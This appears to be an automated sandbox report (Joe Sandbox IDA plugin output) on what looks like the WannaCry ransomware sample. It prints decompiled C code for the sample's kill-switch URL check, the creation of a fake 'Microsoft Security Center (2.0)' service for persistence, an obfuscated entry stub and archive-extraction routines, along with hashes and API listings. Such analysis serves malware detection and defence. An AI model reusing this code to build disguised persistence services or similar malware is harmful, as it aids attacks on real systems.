                    				_push(_t55);
                    				_push(0);
                    				_push(GetModuleHandleA(0));
                    				_t40 = E00408140();
                    				_v108 = _t40;
                    				exit(_t40); // executed
                    				_t41 = _v24;
                    				_t49 =  *((intOrPtr*)( *_t41));
                    				_v124 = _t49;
                    				_push(_t41);
                    				_push(_t49);
                    				L00409B80();
                    				return _t41;
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.471607605.0000000000409000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.471569497.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471579599.0000000000401000.00000080.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471642720.000000000040A000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471671860.000000000040B000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471724107.000000000040F000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471818802.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.473832728.0000000000A71000.00000040.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                    • String ID:
                    • API String ID: 801014965-0
                    • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                    • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
                    • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                    • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 92%
                    			E00408140() {
                    				char* _v1;
                    				char* _v3;
                    				char* _v7;
                    				char* _v11;
                    				char* _v15;
                    				char* _v19;
                    				char* _v23;
                    				void _v80;
                    				char _v100;
                    				char* _t12;
                    				void* _t13;
                    				void* _t27;
                    
                    				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
                    				asm("movsb");
                    				_v23 = _t12;
                    				_v19 = _t12;
                    				_v15 = _t12;
                    				_v11 = _t12;
                    				_v7 = _t12;
                    				_v3 = _t12;
                    				_v1 = _t12;
                    				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
                    				_t27 = _t13;
                    				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
                    				InternetCloseHandle(_t27); // executed
                    				InternetCloseHandle(0);
                    				E00408090();
                    				return 0;
                    			}

                    APIs
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
                    • InternetCloseHandle.WININET(00000000), ref: 004081A7
                    • InternetCloseHandle.WININET(00000000), ref: 004081AB
                      • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                      • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
                    Strings
                    • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
                    Memory Dump Source
                    • Source File: 00000006.00000002.471579599.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.471569497.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471607605.0000000000409000.00000040.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471642720.000000000040A000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471671860.000000000040B000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471724107.000000000040F000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471818802.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.473832728.0000000000A71000.00000040.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
                    • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                    • API String ID: 774561529-2942426231
                    • Opcode ID: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                    • Instruction ID: cdf7c9b464921ed547f6e9cf97b0948ff8b518ee0850ecae1f57fc3afa3cefd0
                    • Opcode Fuzzy Hash: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                    • Instruction Fuzzy Hash: D20186719543106EE310DF348C05B6BBBE9EF85710F01082EF984F7280E6B59804876B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E00407C40() {
                    				char _v260;
                    				void* _t15;
                    				void* _t17;
                    
                    				sprintf( &_v260, "%s -m security", 0x70f760);
                    				_t15 = OpenSCManagerA(0, 0, 0xf003f);
                    				if(_t15 == 0) {
                    					return 0;
                    				} else {
                    					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
                    					if(_t17 != 0) {
                    						StartServiceA(_t17, 0, 0);
                    						CloseServiceHandle(_t17);
                    					}
                    					CloseServiceHandle(_t15);
                    					return 0;
                    				}
                    			}

                    APIs
                    • sprintf.MSVCRT ref: 00407C56
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
                    • CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6F75FB10,00000000), ref: 00407C9B
                    • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.471579599.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.471569497.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471607605.0000000000409000.00000040.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471642720.000000000040A000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471671860.000000000040B000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471724107.000000000040F000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471818802.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.473832728.0000000000A71000.00000040.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
                    • String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
                    • API String ID: 3340711343-4063779371
                    • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                    • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
                    • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                    • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 86%
                    			E00408090() {
                    				char* _v4;
                    				char* _v8;
                    				intOrPtr _v12;
                    				struct _SERVICE_TABLE_ENTRY _v16;
                    				long _t6;
                    				void* _t19;
                    				void* _t22;
                    
                    				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
                    				__imp____p___argc();
                    				_t26 =  *_t6 - 2;
                    				if( *_t6 >= 2) {
                    					_t19 = OpenSCManagerA(0, 0, 0xf003f);
                    					__eflags = _t19;
                    					if(_t19 != 0) {
                    						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
                    						__eflags = _t22;
                    						if(_t22 != 0) {
                    							E00407FA0(_t22, 0x3c);
                    							CloseServiceHandle(_t22);
                    						}
                    						CloseServiceHandle(_t19);
                    					}
                    					_v16 = "mssecsvc2.0";
                    					_v12 = 0x408000;
                    					_v8 = 0;
                    					_v4 = 0;
                    					return StartServiceCtrlDispatcherA( &_v16);
                    				} else {
                    					return E00407F20(_t26);
                    				}
                    			}

                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                    • __p___argc.MSVCRT ref: 004080A5
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
                    • OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6F75FB10,00000000,?,004081B2), ref: 004080DC
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
                    • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
                    • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.471579599.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.471569497.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471607605.0000000000409000.00000040.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471642720.000000000040A000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471671860.000000000040B000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471724107.000000000040F000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471818802.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.473832728.0000000000A71000.00000040.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
                    • String ID: mssecsvc2.0
                    • API String ID: 4274534310-3729025388
                    • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                    • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
                    • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                    • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:40.2%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:7
                    Total number of Limit Nodes:1

                    Callgraph

                    • Executed
                    • Not Executed
                    • Opacity -> Relevance
                    • Disassembly available
                    callgraph 0 Function_00409BA1 1 Function_00A71943 4 Function_00A719EB 1->4 2 Function_00409A16 2->0 2->1 3 Function_00409B8C 2->3 2->4 6 Function_00A719C8 2->6 5 Function_00409B9E

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 409a16-409a8b __set_app_type __p__fmode __p__commode call 409ba1 3 409a99-409af0 call 409b8c _initterm __getmainargs _initterm 0->3 4 409a8d-409a98 __setusermatherr 0->4 7 409af2-409afa 3->7 8 409b2c-409b2f 3->8 4->3 11 409b00-409b03 7->11 12 409afc-409afe 7->12 9 409b31-409b35 8->9 10 409b09-409b0d 8->10 9->8 13 409b13-a71954 10->13 14 409b0f-409b11 10->14 11->10 15 409b05-409b06 11->15 12->7 12->11 17 a71958 13->17 14->13 14->15 15->10 17->17 18 a7195a-a71962 call a719c8 17->18 20 a71967 18->20 21 a71968-a7196a 20->21 21->21 22 a7196c-a7197e 21->22 22->20 23 a71980-a7198a 22->23 23->20 24 a7198c-a719a3 23->24 24->20 25 a719a5-a719bc call a719eb call a71943 24->25 29 a719c1 25->29 29->29
                    C-Code - Quality: 75%
                    			_entry_(void* __ebx) {
                    				intOrPtr _v8;
                    				intOrPtr _v28;
                    				intOrPtr _v52;
                    				intOrPtr _v84;
                    				char _v96;
                    				int _v100;
                    				char** _v104;
                    				intOrPtr _v108;
                    				void _v112;
                    				char** _v116;
                    				intOrPtr* _v120;
                    				void* _v136;
                    				short _v152;
                    				char _v184;
                    				void* __esi;
                    				void* __ebp;
                    				intOrPtr* _t38;
                    				void* _t41;
                    				intOrPtr _t50;
                    				int _t57;
                    				void* _t60;
                    				intOrPtr _t61;
                    				intOrPtr _t62;
                    				intOrPtr _t63;
                    				void* _t66;
                    				void* _t71;
                    				intOrPtr* _t89;
                    				intOrPtr _t96;
                    				intOrPtr _t98;
                    				intOrPtr _t99;
                    				intOrPtr* _t100;
                    				void* _t102;
                    				intOrPtr _t104;
                    				void* _t112;
                    				intOrPtr _t115;
                    
                    				_t96 = _t98;
                    				_push(0xffffffff);
                    				_push(0x40a1a0);
                    				_push(0x409ba2);
                    				_push( *[fs:0x0]);
                    				 *[fs:0x0] = _t98;
                    				_t99 = _t98 - 0x68;
                    				_push(__ebx);
                    				_v28 = _t99;
                    				_v8 = 0;
                    				__set_app_type(2);
                    				 *0x70f894 =  *0x70f894 | 0xffffffff;
                    				 *0x70f898 =  *0x70f898 | 0xffffffff;
                    				 *(__p__fmode()) =  *0x70f88c;
                    				_t38 = __p__commode();
                    				_t70 =  *0x70f888;
                    				 *_t38 =  *0x70f888;
                    				 *0x70f890 = _adjust_fdiv;
                    				_t41 = E00409BA1( *_adjust_fdiv);
                    				_t104 =  *0x431410; // 0x1
                    				if(_t104 == 0) {
                    					__setusermatherr(E00409B9E);
                    					_pop(_t70);
                    				}
                    				E00409B8C(_t41);
                    				_push(0x40b010);
                    				_push(0x40b00c);
                    				L00409B86();
                    				_v112 =  *0x70f884;
                    				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
                    				_push(0x40b008);
                    				_push(0x40b000); // executed
                    				L00409B86(); // executed
                    				_t100 = _t99 + 0x24;
                    				_t89 =  *_acmdln;
                    				_v120 = _t89;
                    				if( *_t89 != 0x22) {
                    					while(1) {
                    						__eflags =  *_t89 - 0x20;
                    						if( *_t89 <= 0x20) {
                    							goto L7;
                    						}
                    						_t89 = _t89 + 1;
                    						_v120 = _t89;
                    					}
                    				} else {
                    					do {
                    						_t89 = _t89 + 1;
                    						_v120 = _t89;
                    						_t63 =  *_t89;
                    					} while (_t63 != 0 && _t63 != 0x22);
                    					if( *_t89 == 0x22) {
                    						L6:
                    						_t89 = _t89 + 1;
                    						_v120 = _t89;
                    					}
                    				}
                    				L7:
                    				_t50 =  *_t89;
                    				if(_t50 != 0 && _t50 <= 0x20) {
                    					goto L6;
                    				}
                    				_v52 = 0;
                    				_push( &_v96);
                    				_t112 =  *_t100 - 0xfffffffe;
                    				do {
                    				} while (_t112 > 0);
                    				asm("pushad");
                    				_t102 =  &_v184 - 0xffffffdc;
                    				E00A719C8();
                    				goto L19;
                    				do {
                    					do {
                    						do {
                    							L19:
                    							_t66 = 0xffffffffffffffff;
                    							do {
                    								_t66 = _t66 - 1;
                    							} while (_t66 != 0);
                    							_t71 =  *((intOrPtr*)(_t66 + 0x3c));
                    							_t70 = _t71 - 0x7ffffffd;
                    							_t115 = _t70;
                    						} while (_t115 >= 0);
                    						asm("sbb ecx, 0x13e6");
                    					} while (_t115 >= 0);
                    					_push( *((intOrPtr*)(_t70 + _t66 - 0x7fffec1c)));
                    					_t102 = _t102 + 4;
                    					_t29 =  &_v152;
                    					 *_t29 = _v152 + 0xbab0;
                    					_t117 =  *_t29;
                    					_t70 = 0x1c;
                    				} while ( *_t29 != 0);
                    				_t90 = _t89 - 1;
                    				_push(0xa49ecbc2);
                    				E00A719EB(_t66);
                    				_v84 = _t89 - 1;
                    				_t57 = E00A71943(_t96, 0x11, _t90, _t117);
                    				_v100 = _t57;
                    				if(_t57 - 4 >= 0) {
                    					asm("cmc");
                    					_t61 =  *[fs:0x18];
                    					if(_t61 < 0) {
                    						_push(0xa6024027);
                    						_t62 = E00A719EB(_t66);
                    						L00A719E5();
                    					} else {
                    						_t62 =  *((intOrPtr*)(_t61 + 0x34));
                    					}
                    					if(_t62 == _t66) {
                    						L00A71750();
                    					}
                    					_push(0xda7ccb23);
                    					E00A719EB(_t66);
                    					_push(_v108);
                    					L00A719E5();
                    				}
                    				 *0x409b1a = 0xff;
                    				 *0x409b1b = 0x40a0a815;
                    				_pop(_t60);
                    				return _t60;
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.486366040.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000009.00000002.486353222.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000009.00000002.486380546.000000000040A000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000009.00000002.486424310.000000000040B000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000009.00000002.486435821.000000000040F000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000009.00000002.486521538.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000009.00000002.486575854.0000000000710000.00000080.00000001.01000000.00000004.sdmp
                    • Associated: 00000009.00000002.487502234.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr
                    • String ID:
                    • API String ID: 1833031408-0
                    • Opcode ID: a365f86c44af7ee06adfb86f211ffad994c8d5494fd4270591a0fcda9132069a
                    • Instruction ID: 2d268dbdd5137c31dab964fb5980349a55b327ae395291bae86744ddf9a5f2fd
                    • Opcode Fuzzy Hash: a365f86c44af7ee06adfb86f211ffad994c8d5494fd4270591a0fcda9132069a
                    • Instruction Fuzzy Hash: 8441B171800308DFCB24DFA8DD41A997BB4FB09720F24823FE5A5672D2D7786906CB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E00406C40(intOrPtr* __ecx, void* __edx, intOrPtr _a4, void* _a8, signed int _a11) {
                    				signed int _v5;
                    				signed char _v10;
                    				char _v11;
                    				char _v12;
                    				char _v16;
                    				char _v20;
                    				intOrPtr* _v24;
                    				struct _FILETIME _v32;
                    				struct _FILETIME _v40;
                    				char _v44;
                    				unsigned int _v72;
                    				intOrPtr _v96;
                    				intOrPtr _v100;
                    				unsigned int _v108;
                    				unsigned int _v124;
                    				char _v384;
                    				char _v644;
                    				char _t142;
                    				char _t150;
                    				void* _t151;
                    				signed char _t156;
                    				long _t173;
                    				signed char _t185;
                    				signed char* _t190;
                    				signed char* _t194;
                    				intOrPtr* _t204;
                    				signed int _t207;
                    				signed int _t208;
                    				intOrPtr* _t209;
                    				unsigned int _t210;
                    				char _t212;
                    				signed char _t230;
                    				signed int _t234;
                    				signed char _t238;
                    				void* _t263;
                    				unsigned int _t264;
                    				signed int _t269;
                    				signed int _t270;
                    				signed int _t271;
                    				intOrPtr _t272;
                    				char* _t274;
                    				unsigned int _t276;
                    				signed int _t277;
                    				void* _t278;
                    				intOrPtr* _t280;
                    				void* _t281;
                    				intOrPtr _t282;
                    
                    				_t263 = __edx;
                    				_t213 = __ecx;
                    				_t272 = _a4;
                    				_t208 = _t207 | 0xffffffff;
                    				_t280 = __ecx;
                    				_v24 = __ecx;
                    				if(_t272 < _t208) {
                    					L61:
                    					return 0x10000;
                    				}
                    				_t131 =  *__ecx;
                    				if(_t272 >=  *((intOrPtr*)( *__ecx + 4))) {
                    					goto L61;
                    				}
                    				if( *((intOrPtr*)(__ecx + 4)) != _t208) {
                    					E00406A97(_t131);
                    					_pop(_t213);
                    				}
                    				 *(_t280 + 4) = _t208;
                    				if(_t272 !=  *((intOrPtr*)(_t280 + 0x134))) {
                    					if(_t272 != _t208) {
                    						_t132 =  *_t280;
                    						if(_t272 >=  *( *_t280 + 0x10)) {
                    							L12:
                    							_t133 =  *_t280;
                    							if( *( *_t280 + 0x10) >= _t272) {
                    								E004064BB( *_t280,  &_v124,  &_v384, 0x104, 0, 0, 0, 0);
                    								if(L0040657A(_t213, _t263,  *_t280,  &_v44,  &_v20,  &_v16) == 0) {
                    									_t142 = E00405D0E( *((intOrPtr*)( *_t280)), _v20, 0);
                    									if(_t142 != 0) {
                    										L19:
                    										return 0x800;
                    									}
                    									_push(_v16);
                    									L00407700();
                    									_v12 = _t142;
                    									if(L00405D8A(_t142, 1, _v16,  *((intOrPtr*)( *_t280))) == _v16) {
                    										_t281 = _a8;
                    										 *_t281 =  *( *_t280 + 0x10);
                    										strcpy( &_v644,  &_v384);
                    										_t209 = __imp___mbsstr;
                    										_t274 =  &_v644;
                    										while(1) {
                    											L21:
                    											_t150 =  *_t274;
                    											if(_t150 != 0 && _t274[1] == 0x3a) {
                    												break;
                    											}
                    											if(_t150 == 0x5c || _t150 == 0x2f) {
                    												_t274 =  &(_t274[1]);
                    												continue;
                    											} else {
                    												_t151 =  *_t209(_t274, "\\..\\");
                    												if(_t151 != 0) {
                    													L31:
                    													_t39 = _t151 + 4; // 0x4
                    													_t274 = _t39;
                    													continue;
                    												}
                    												_t151 =  *_t209(_t274, "\\../");
                    												if(_t151 != 0) {
                    													goto L31;
                    												}
                    												_t151 =  *_t209(_t274, "/../");
                    												if(_t151 != 0) {
                    													goto L31;
                    												}
                    												_t151 =  *_t209(_t274, "/..\\");
                    												if(_t151 == 0) {
                    													strcpy(_t281 + 4, _t274);
                    													_t264 = _v72;
                    													_a11 = _a11 & 0x00000000;
                    													_v5 = _v5 & 0x00000000;
                    													_t156 = _t264 >> 0x0000001e & 0x00000001;
                    													_t230 =  !(_t264 >> 0x17) & 0x00000001;
                    													_t276 = _v124 >> 8;
                    													_t210 = 1;
                    													if(_t276 == 0 || _t276 == 7 || _t276 == 0xb || _t276 == 0xe) {
                    														_a11 = _t264 >> 0x00000001 & 0x00000001;
                    														_t230 = _t264 & 0x00000001;
                    														_v5 = _t264 >> 0x00000002 & 0x00000001;
                    														_t156 = _t264 >> 0x00000004 & 0x00000001;
                    														_t264 = _t264 >> 0x00000005 & 0x00000001;
                    														_t210 = _t264;
                    													}
                    													_t277 = 0;
                    													 *(_t281 + 0x108) = 0;
                    													if(_t156 != 0) {
                    														 *(_t281 + 0x108) = 0x10;
                    													}
                    													if(_t210 != 0) {
                    														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000020;
                    													}
                    													if(_a11 != 0) {
                    														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000002;
                    													}
                    													if(_t230 != 0) {
                    														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000001;
                    													}
                    													if(_v5 != 0) {
                    														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000004;
                    													}
                    													 *((intOrPtr*)(_t281 + 0x124)) = _v100;
                    													 *((intOrPtr*)(_t281 + 0x128)) = _v96;
                    													_v40.dwLowDateTime = E00406B23(_v108 >> 0x10, _v108);
                    													_v40.dwHighDateTime = _t264;
                    													LocalFileTimeToFileTime( &_v40,  &_v32);
                    													_t173 = _v32.dwLowDateTime;
                    													_t234 = _v32.dwHighDateTime;
                    													_t212 = _v12;
                    													 *(_t281 + 0x10c) = _t173;
                    													 *(_t281 + 0x114) = _t173;
                    													 *(_t281 + 0x11c) = _t173;
                    													 *(_t281 + 0x110) = _t234;
                    													 *(_t281 + 0x118) = _t234;
                    													 *(_t281 + 0x120) = _t234;
                    													if(_v16 <= 4) {
                    														L57:
                    														if(_t212 != 0) {
                    															_push(_t212);
                    															L004076E8();
                    														}
                    														_t282 = _v24;
                    														memcpy(_t282 + 8, _t281, 0x12c);
                    														 *((intOrPtr*)(_t282 + 0x134)) = _a4;
                    														goto L60;
                    													} else {
                    														while(1) {
                    															_v12 =  *((intOrPtr*)(_t277 + _t212));
                    															_v10 = _v10 & 0x00000000;
                    															_v11 =  *((intOrPtr*)(_t212 + _t277 + 1));
                    															_a8 =  *(_t212 + _t277 + 2) & 0x000000ff;
                    															if(strcmp( &_v12, "UT") == 0) {
                    																break;
                    															}
                    															_t277 = _t277 + _a8 + 4;
                    															if(_t277 + 4 < _v16) {
                    																continue;
                    															}
                    															goto L57;
                    														}
                    														_t238 =  *(_t277 + _t212 + 4) & 0x000000ff;
                    														_t185 = _t238 >> 0x00000001 & 0x00000001;
                    														_t278 = _t277 + 5;
                    														_a11 = _t185;
                    														_v5 = _t238 >> 0x00000002 & 0x00000001;
                    														if((_t238 & 0x00000001) != 0) {
                    															_t271 =  *(_t278 + _t212 + 1) & 0x000000ff;
                    															_t194 = _t278 + _t212;
                    															_t278 = _t278 + 4;
                    															 *(_t281 + 0x11c) = E00406B02(_t271,  *_t194 & 0x000000ff | (0 << 0x00000008 | _t271) << 0x00000008);
                    															_t185 = _a11;
                    															 *(_t281 + 0x120) = _t271;
                    														}
                    														if(_t185 != 0) {
                    															_t270 =  *(_t278 + _t212 + 1) & 0x000000ff;
                    															_t190 = _t278 + _t212;
                    															_t278 = _t278 + 4;
                    															 *(_t281 + 0x10c) = E00406B02(_t270,  *_t190 & 0x000000ff | (0 << 0x00000008 | _t270) << 0x00000008);
                    															 *(_t281 + 0x110) = _t270;
                    														}
                    														if(_v5 != 0) {
                    															_t269 =  *(_t278 + _t212 + 1) & 0x000000ff;
                    															 *(_t281 + 0x114) = E00406B02(_t269,  *(_t278 + _t212) & 0x000000ff | (0 << 0x00000008 | _t269) << 0x00000008);
                    															 *(_t281 + 0x118) = _t269;
                    														}
                    														goto L57;
                    													}
                    												}
                    												goto L31;
                    											}
                    										}
                    										_t274 =  &(_t274[2]);
                    										goto L21;
                    									}
                    									_push(_v12);
                    									L004076E8();
                    									goto L19;
                    								}
                    								return 0x700;
                    							}
                    							E00406520(_t133);
                    							L11:
                    							_pop(_t213);
                    							goto L12;
                    						}
                    						E004064E2(_t213, _t132);
                    						goto L11;
                    					}
                    					goto L8;
                    				} else {
                    					if(_t272 == _t208) {
                    						L8:
                    						_t204 = _a8;
                    						 *_t204 =  *((intOrPtr*)( *_t280 + 4));
                    						 *((char*)(_t204 + 4)) = 0;
                    						 *((intOrPtr*)(_t204 + 0x108)) = 0;
                    						 *((intOrPtr*)(_t204 + 0x10c)) = 0;
                    						 *((intOrPtr*)(_t204 + 0x110)) = 0;
                    						 *((intOrPtr*)(_t204 + 0x114)) = 0;
                    						 *((intOrPtr*)(_t204 + 0x118)) = 0;
                    						 *((intOrPtr*)(_t204 + 0x11c)) = 0;
                    						 *((intOrPtr*)(_t204 + 0x120)) = 0;
                    						 *((intOrPtr*)(_t204 + 0x124)) = 0;
                    						 *((intOrPtr*)(_t204 + 0x128)) = 0;
                    						L60:
                    						return 0;
                    					}
                    					memcpy(_a8, _t280 + 8, 0x12c);
                    					goto L60;
                    				}
                    			}
                    0x00406cf9
                    0x00406cf9
                    0x00000000
                    0x00406cf9
                    0x00406cf4
                    0x00000000
                    0x00406cf4
                    0x00000000
                    0x00406c81
                    0x00406c83
                    0x00406ca2
                    0x00406ca7
                    0x00406caa
                    0x00406cae
                    0x00406cb1
                    0x00406cb7
                    0x00406cbd
                    0x00406cc3
                    0x00406cc9
                    0x00406ccf
                    0x00406cd5
                    0x00406cdb
                    0x00406ce1
                    0x00407060
                    0x00000000
                    0x00407060
                    0x00406c91
                    0x00000000
                    0x00406c96

                    APIs
                    • memcpy.MSVCRT(?,?,0000012C,?), ref: 00406C91
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: memcpy
                    • String ID: /../$/..\$\../$\..\
                    • API String ID: 3510742995-3885502717
                    • Opcode ID: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
